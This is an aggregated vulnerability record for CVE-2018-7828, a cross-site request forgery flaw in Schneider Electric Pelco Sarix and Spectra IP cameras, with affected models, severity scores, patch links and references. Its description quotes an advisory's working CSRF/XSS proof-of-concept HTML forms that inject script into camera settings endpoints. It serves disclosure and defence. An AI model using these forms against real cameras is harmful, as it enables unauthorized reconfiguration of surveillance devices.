Details of VAR-201905-1040

ID

VAR-201905-1040

CVE

CVE-2018-7828

TITLE

Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Cross-Site Request Forgery Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2019-16262 // CNNVD: CNNVD-201905-912

DESCRIPTION

A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need. Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php 07.04.2017 -- CSRF/XSS on username parameter: ------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/dot1x/update" method="POST"> <input type="hidden" name="dot1x" value="on" /> <input type="hidden" name="protocol" value="EAP-TLS" /> <input type="hidden" name="inner_auth" value="CHAP" /> <input type="hidden" name="username" value='"><script>alert(1)</script>' /> <input type="hidden" name="password" value="blah" /> <input type="hidden" name="anonymous_id" value="" /> <input type="hidden" name="ca_certificate" value="test" /> <input type="hidden" name="client_certificate" value="test" /> <input type="hidden" name="private_key" value="test" /> <input type="hidden" name="private_key_password" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter: ------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/general/update" method="POST"> <input type="hidden" name="hostname" value='"><script>alert(2)</script>' /> <input type="hidden" name="http_port" value='"><script>alert(3)</script>' /> <input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' /> <input type="hidden" name="dhcp" value="off" /> <input type="hidden" name="ip_address" value='"><script>alert(5)</script>' /> <input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' /> <input type="hidden" name="gateway" value='"><script>alert(7)</script>' /> <input type="hidden" name="nameservers" value='"><script>alert(8)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on version parameter: ------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/snmp/update" method="POST"> <input type="hidden" name="version" value='";alert(9)//' /> <input type="hidden" name="v2_community_string" value="public" /> <input type="hidden" name="v2_receiver_address" value="" /> <input type="hidden" name="v2_trap_community_string" value="trapbratce" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter: ---------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/system/general/update" method="POST"> <input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' /> <input type="hidden" name="enable_leds" value="on" /> <input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' /> <input type="hidden" name="ntp_server_from_dhcp" value="false" /> <input type="hidden" name="ntp_server" value="';alert(12)//'" /> <input type="hidden" name="region" value="Macedonia';alert(13)//" /> <input type="hidden" name="zone" value="Kumanovo';alert(14)//" /> <input type="hidden" name="enable_time_overlay" value="on" /> <input type="hidden" name="enable_name_overlay" value="off" /> <input type="hidden" name="position" value="topright" /> <input type="hidden" name="date_format" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter: -------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/events/handlers/update" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="relay_sentinel" value="relay_sentinel" /> <input type="hidden" name="name" value='"><script>alert(15)</script>' /> <input type="hidden" name="type" value="Ftp" /> <input type="hidden" name="email_to" value="" /> <input type="hidden" name="email_from" value="" /> <input type="hidden" name="email_subject" value="" /> <input type="hidden" name="email_message" value="" /> <input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="limit_size" value="" /> <input type="hidden" name="limit_size_scale" value="K" /> <input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' /> <input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' /> <input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' /> <input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' /> <input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="relay_bankName" value="GPIO" /> <input type="hidden" name="relay_index" value="0" /> <input type="hidden" name="relay_on_time" value="0.1" /> <input type="hidden" name="relay_off_time" value="0.1" /> <input type="hidden" name="relay_pulse_count" value="" /> <input type="hidden" name="filter_start0" value="" /> <input type="hidden" name="filter_stop0" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Trust: 3.06

sources: NVD: CVE-2018-7828 // JVNDB: JVNDB-2018-015521 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16262 // ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5416 // ZSL: ZSL-2017-5415 // PACKETSTORM: 143313

IOT TAXONOMY

category:	['ICS', 'Network device']	sub_category:	-	Trust: 0.6
category:	['Network device']	sub_category:	-	Trust: 0.6
category:	['camera device']	sub_category:	camera	Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16262

AFFECTED PRODUCTS

vendor:	schneider electric	model:	imes19-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe11	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220l	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixes1	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe21	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6230	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime119-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6230l	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe31	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6220l	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6230	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6230l	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1i	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1p	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1s	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1i	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1p	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1s	scope:	-	version:	-	Trust: 0.8
vendor:	pelco	model:	sarix/spectra cameras	scope:	-	version:	-	Trust: 0.6
vendor:	schneider	model:	electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric 1st gen pelco sarix enhanced camera	scope:	-	version:	-	Trust: 0.6
vendor:	schneider	model:	electric spectra enhanced ptz camera	scope:	-	version:	-	Trust: 0.6
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras csrf enable ssh root access	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras csrf enable ssh root access	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras csrf enable ssh root access	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras csrf enable ssh root access	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras csrf enable ssh root access	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5416 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16262 // JVNDB: JVNDB-2018-015521 // NVD: CVE-2018-7828

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-7828
value:	HIGH
Trust: 1.0
NVD:	CVE-2018-7828
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2017-23302
value:	MEDIUM
Trust: 0.6
CNVD:	CNVD-2019-16262
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201905-912
value:	HIGH
Trust: 0.6
ZSL:	ZSL-2017-5417
value:	(4/5)
Trust: 0.1
ZSL:	ZSL-2017-5416
value:	(4/5)
Trust: 0.1
ZSL:	ZSL-2017-5415
value:	(3/5)
Trust: 0.1

nvd@nist.gov:	CVE-2018-7828
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.6
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2017-23302
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
CNVD:	CNVD-2019-16262
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.6
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2018-7828
baseSeverity:	HIGH
baseScore:	8.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	REQUIRED
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	2.8
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5416 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16262 // JVNDB: JVNDB-2018-015521 // CNNVD: CNNVD-201905-912 // NVD: CVE-2018-7828

PROBLEMTYPE DATA

problemtype:

CWE-352

Trust: 1.8

sources: JVNDB: JVNDB-2018-015521 // NVD: CVE-2018-7828

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201905-912

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201905-912

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-015521

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5416 // ZSL: ZSL-2017-5415

PATCH

title:	SEVD-2019-045-03	url:	https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/	Trust: 0.8
title:	Patch for SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Cross-Site Request Forgery Vulnerability	url:	https://www.cnvd.org.cn/patchInfo/show/162751	Trust: 0.6
title:	Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Fixes for cross-site request forgery vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92890	Trust: 0.6

sources: CNVD: CNVD-2019-16262 // JVNDB: JVNDB-2018-015521 // CNNVD: CNNVD-201905-912

EXTERNAL IDS

db:	NVD	id:	CVE-2018-7828	Trust: 3.2
db:	SCHNEIDER	id:	SEVD-2019-045-03	Trust: 2.5
db:	JVNDB	id:	JVNDB-2018-015521	Trust: 0.8
db:	EXPLOIT-DB	id:	42307	Trust: 0.7
db:	EXPLOITDB	id:	42307	Trust: 0.6
db:	CNVD	id:	CNVD-2017-23302	Trust: 0.6
db:	CNVD	id:	CNVD-2019-16262	Trust: 0.6
db:	CNNVD	id:	CNNVD-201905-912	Trust: 0.6
db:	PACKETSTORM	id:	143313	Trust: 0.2
db:	ZSL	id:	ZSL-2017-5415	Trust: 0.2
db:	PACKETSTORM	id:	143315	Trust: 0.1
db:	NVD	id:	CVE-2018-7829	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070080	Trust: 0.1
db:	EXPLOIT-DB	id:	42309	Trust: 0.1
db:	ZSL	id:	ZSL-2017-5417	Trust: 0.1
db:	EXPLOIT-DB	id:	42308	Trust: 0.1
db:	PACKETSTORM	id:	143314	Trust: 0.1
db:	SCHNEIDER	id:	SEVD-2018-058-01	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070076	Trust: 0.1
db:	ZSL	id:	ZSL-2017-5416	Trust: 0.1
db:	NVD	id:	CVE-2018-7827	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070075	Trust: 0.1
db:	OTHER	id:	NONE	Trust: 0.1

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5416 // ZSL: ZSL-2017-5415 // OTHER: None // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16262 // JVNDB: JVNDB-2018-015521 // PACKETSTORM: 143313 // CNNVD: CNNVD-201905-912 // NVD: CVE-2018-7828

REFERENCES

url:	https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/	Trust: 2.5
url:	https://nvd.nist.gov/vuln/detail/cve-2018-7828	Trust: 1.4
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7828	Trust: 0.9
url:	https://www.exploit-db.com/exploits/42307/	Trust: 0.7
url:	https://www.exploit-db.com/exploits/42309/	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070080	Trust: 0.1
url:	https://packetstormsecurity.com/files/143315	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129667	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829	Trust: 0.1
url:	https://www.exploit-db.com/exploits/42308/	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070076	Trust: 0.1
url:	https://packetstormsecurity.com/files/143314	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129666	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7236	Trust: 0.1
url:	https://www.schneider-electric.com/en/download/document/sevd-2018-058-01/	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070075	Trust: 0.1
url:	https://packetstormsecurity.com/files/143313	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129665	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827	Trust: 0.1
url:	https://ieeexplore.ieee.org/abstract/document/10769424	Trust: 0.1
url:	http://192.168.1.1/setup/network/dot1x/update"	Trust: 0.1
url:	http://192.168.1.1/setup/system/general/update"	Trust: 0.1
url:	http://192.168.1.1/setup/events/handlers/update"	Trust: 0.1
url:	http://192.168.1.1/setup/network/general/update"	Trust: 0.1
url:	http://192.168.1.1/setup/network/snmp/update"	Trust: 0.1
url:	https://www.pelco.com	Trust: 0.1
url:	http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php	Trust: 0.1

CREDITS

Vulnerability discovered by Gjoko Krstic

Trust: 0.3

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5416 // ZSL: ZSL-2017-5415

SOURCES

db:	ZSL	id:	ZSL-2017-5417
db:	ZSL	id:	ZSL-2017-5416
db:	ZSL	id:	ZSL-2017-5415
db:	OTHER	id:	-
db:	CNVD	id:	CNVD-2017-23302
db:	CNVD	id:	CNVD-2019-16262
db:	JVNDB	id:	JVNDB-2018-015521
db:	PACKETSTORM	id:	143313
db:	CNNVD	id:	CNNVD-201905-912
db:	NVD	id:	CVE-2018-7828

LAST UPDATE DATE

2025-01-30T19:43:39.282000+00:00

SOURCES UPDATE DATE

db:	ZSL	id:	ZSL-2017-5417	date:	2019-02-23T00:00:00
db:	ZSL	id:	ZSL-2017-5416	date:	2019-02-23T00:00:00
db:	ZSL	id:	ZSL-2017-5415	date:	2019-02-23T00:00:00
db:	CNVD	id:	CNVD-2017-23302	date:	2017-08-28T00:00:00
db:	CNVD	id:	CNVD-2019-16262	date:	2019-06-02T00:00:00
db:	JVNDB	id:	JVNDB-2018-015521	date:	2019-06-11T00:00:00
db:	CNNVD	id:	CNNVD-201905-912	date:	2019-05-29T00:00:00
db:	NVD	id:	CVE-2018-7828	date:	2024-11-21T04:12:48.500

SOURCES RELEASE DATE

db:	ZSL	id:	ZSL-2017-5417	date:	2017-07-10T00:00:00
db:	ZSL	id:	ZSL-2017-5416	date:	2017-07-10T00:00:00
db:	ZSL	id:	ZSL-2017-5415	date:	2017-07-10T00:00:00
db:	CNVD	id:	CNVD-2017-23302	date:	2017-08-28T00:00:00
db:	CNVD	id:	CNVD-2019-16262	date:	2019-06-02T00:00:00
db:	JVNDB	id:	JVNDB-2018-015521	date:	2019-06-11T00:00:00
db:	PACKETSTORM	id:	143313	date:	2017-07-11T04:32:15
db:	CNNVD	id:	CNNVD-201905-912	date:	2019-05-22T00:00:00
db:	NVD	id:	CVE-2018-7828	date:	2019-05-22T20:29:01.307